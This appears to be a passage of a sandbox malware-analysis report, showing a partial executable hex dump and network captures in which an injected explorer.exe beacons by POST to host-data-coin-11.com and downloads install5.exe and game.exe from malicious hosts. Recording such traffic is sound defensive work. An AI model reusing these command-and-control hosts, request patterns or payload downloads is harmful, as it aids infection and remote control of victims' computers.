                                                                                                                                                                                                    Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 32 74 07 b2 76 15 69 e1 76 15 69 e1 76 15 69 e1 68 47 fc e1 69 15 69 e1 68 47 ea e1 fc 15 69 e1 68 47 ed e1 5b 15 69 e1 51 d3 12 e1 71 15 69 e1 76 15 68 e1 f9 15 69 e1 68 47 e3 e1 77 15 69 e1 68 47 fd e1 77 15 69 e1 68 47 f8 e1 77 15 69 e1 52 69 63 68 76 15 69 e1 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 d4 e8 62 5f 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 1e 01 00 00 f6 03 00 00 00 00 00 9f 2d 00 00 00 10 00 00 00 30 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 20 05 00 00 04 00 00 a7 ea 04 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 b0 65 01 00 50 00 00 00 00 00 04 00 b0 10 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 32 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 59 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 30 01 00 ac 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c5 1d 01 00 00 10 00 00 00 1e 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 44 3f 00 00 00 30 01 00 00 40 00 00 00 22 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 58 84 02 00 00 70 01 00 00 24 02 00 00 62 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 10 01 00 00 00 04 00 00 12 01 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 56 8d 44 24 08 50 8b f1 e8 d9 11 00 00 c7 06 30 32 41 00 8b c6 5e c2 04 00 c7 01 30 32 41 00 e9 8f 12 00 00 56 8b f1 c7 06 30 32 41 00 e8 81 12 00 00 f6 44 24
                                                                                                                                                                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$2tvivivihGiihGihG[iQqivhihGwihGwihGwiRichviPELb_-0@ eP2 Y@0.text `.rdataD?0@"@@.dataXp$b@.rsrc@@VD$P02A^02AV02AD$


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                    15192.168.2.34975794.142.143.9180C:\Windows\explorer.exe
                                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                                    Jan 14, 2022 04:59:04.158576965 CET1439OUTPOST / HTTP/1.1
                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Referer: http://hxaovqrpb.com/
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                    Content-Length: 205
                                                                                                                                                                                                    Host: host-data-coin-11.com
                                                                                                                                                                                                    Jan 14, 2022 04:59:04.240540028 CET1440INHTTP/1.1 404 Not Found
                                                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                                                    Date: Fri, 14 Jan 2022 03:59:04 GMT
                                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                    Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                    16192.168.2.34975894.142.143.9180C:\Windows\explorer.exe
                                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                                    Jan 14, 2022 04:59:04.347033978 CET1441OUTPOST / HTTP/1.1
                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Referer: http://afnhk.org/
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                    Content-Length: 207
                                                                                                                                                                                                    Host: host-data-coin-11.com
                                                                                                                                                                                                    Jan 14, 2022 04:59:04.428491116 CET1442INHTTP/1.1 404 Not Found
                                                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                                                    Date: Fri, 14 Jan 2022 03:59:04 GMT
                                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                    Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                    17192.168.2.34975994.142.143.9180C:\Windows\explorer.exe
                                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                                    Jan 14, 2022 04:59:04.515151024 CET1442OUTPOST / HTTP/1.1
                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Referer: http://uyqwcjxbf.org/
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                    Content-Length: 267
                                                                                                                                                                                                    Host: host-data-coin-11.com
                                                                                                                                                                                                    Jan 14, 2022 04:59:04.600716114 CET1443INHTTP/1.1 404 Not Found
                                                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                                                    Date: Fri, 14 Jan 2022 03:59:04 GMT
                                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                    Data Raw: 33 37 0d 0a 02 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e d6 1e 52 25 40 a3 f5 c2 ea fb 5f f5 4d 8b 2d e4 04 08 c7 5c a5 ba 7a ae 2e 54 0a e3 f0 d8 4b fc 05 d4 43 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 37I:82OR%@_M-\z.TKC0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                    18192.168.2.34976194.142.143.9180C:\Windows\explorer.exe
                                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                                    Jan 14, 2022 04:59:05.157767057 CET1450OUTPOST / HTTP/1.1
                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Referer: http://bncatspln.net/
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                    Content-Length: 349
                                                                                                                                                                                                    Host: host-data-coin-11.com
                                                                                                                                                                                                    Jan 14, 2022 04:59:05.243841887 CET1450INHTTP/1.1 200 OK
                                                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                                                    Date: Fri, 14 Jan 2022 03:59:05 GMT
                                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                    Connection: close


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                    19192.168.2.34976294.142.143.9180C:\Windows\explorer.exe
                                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                                    Jan 14, 2022 04:59:05.733947992 CET1451OUTPOST / HTTP/1.1
                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Referer: http://bwonexybi.com/
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                    Content-Length: 262
                                                                                                                                                                                                    Host: host-data-coin-11.com
                                                                                                                                                                                                    Jan 14, 2022 04:59:05.823020935 CET1452INHTTP/1.1 404 Not Found
                                                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                                                    Date: Fri, 14 Jan 2022 03:59:05 GMT
                                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                    Data Raw: 32 65 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f d4 89 4f 04 7e 02 fc a9 8d b6 e4 05 ab 0c 91 6b b9 45 4b 95 09 fd bc 67 e5 32 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 2eI:82OO~kEKg2P0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                    2192.168.2.349858172.67.139.105443C:\Windows\explorer.exe
                                                                                                                                                                                                    TimestampkBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                    20192.168.2.34976354.38.220.8580C:\Windows\explorer.exe
                                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                                    Jan 14, 2022 04:59:05.878139019 CET1453OUTGET /install5.exe HTTP/1.1
                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                    Host: unicupload.top
                                                                                                                                                                                                    Jan 14, 2022 04:59:05.897200108 CET1453INHTTP/1.1 404 Not Found
                                                                                                                                                                                                    Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                    Date: Fri, 14 Jan 2022 03:57:44 GMT
                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                    Content-Length: 178
                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                    21192.168.2.34976494.142.143.9180C:\Windows\explorer.exe
                                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                                    Jan 14, 2022 04:59:05.983947992 CET1454OUTPOST / HTTP/1.1
                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Referer: http://sworutss.com/
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                    Content-Length: 124
                                                                                                                                                                                                    Host: host-data-coin-11.com
                                                                                                                                                                                                    Jan 14, 2022 04:59:06.071681976 CET1456INHTTP/1.1 404 Not Found
                                                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                                                    Date: Fri, 14 Jan 2022 03:59:06 GMT
                                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                    Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                    22192.168.2.34976694.142.143.9180C:\Windows\explorer.exe
                                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                                    Jan 14, 2022 04:59:06.476031065 CET1457OUTPOST / HTTP/1.1
                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Referer: http://drlfnir.com/
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                    Content-Length: 357
                                                                                                                                                                                                    Host: host-data-coin-11.com
                                                                                                                                                                                                    Jan 14, 2022 04:59:06.579536915 CET1457INHTTP/1.1 200 OK
                                                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                                                    Date: Fri, 14 Jan 2022 03:59:06 GMT
                                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                    Connection: close


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                    23192.168.2.34976794.142.143.9180C:\Windows\explorer.exe
                                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                                    Jan 14, 2022 04:59:06.662708044 CET1463OUTPOST / HTTP/1.1
                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Referer: http://rvqyadtl.com/
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                    Content-Length: 355
                                                                                                                                                                                                    Host: host-data-coin-11.com
                                                                                                                                                                                                    Jan 14, 2022 04:59:06.748112917 CET1464INHTTP/1.1 404 Not Found
                                                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                                                    Date: Fri, 14 Jan 2022 03:59:06 GMT
                                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                    Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                    24192.168.2.34976894.142.143.9180C:\Windows\explorer.exe
                                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                                    Jan 14, 2022 04:59:06.836819887 CET1465OUTPOST / HTTP/1.1
                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Referer: http://irhpoqhlc.net/
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                    Content-Length: 165
                                                                                                                                                                                                    Host: host-data-coin-11.com
                                                                                                                                                                                                    Jan 14, 2022 04:59:06.922924042 CET1466INHTTP/1.1 404 Not Found
                                                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                                                    Date: Fri, 14 Jan 2022 03:59:06 GMT
                                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                    Data Raw: 33 30 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f6 e8 24 e5 64 50 06 b9 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 30I:82OR&:UPJ$dP0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                    25192.168.2.34976994.142.143.9180C:\Windows\explorer.exe
                                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                                    Jan 14, 2022 04:59:07.277445078 CET1533OUTGET /game.exe HTTP/1.1
                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                    Host: data-host-coin-8.com
                                                                                                                                                                                                    Jan 14, 2022 04:59:07.343255043 CET1535INHTTP/1.1 200 OK
                                                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                                                    Date: Fri, 14 Jan 2022 03:59:07 GMT
                                                                                                                                                                                                    Content-Type: application/x-msdos-program
                                                                                                                                                                                                    Content-Length: 323584
                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                    Last-Modified: Fri, 14 Jan 2022 03:59:02 GMT
                                                                                                                                                                                                    ETag: "4f000-5d582d2c452d6"
                                                                                                                                                                                                    Accept-Ranges: bytes
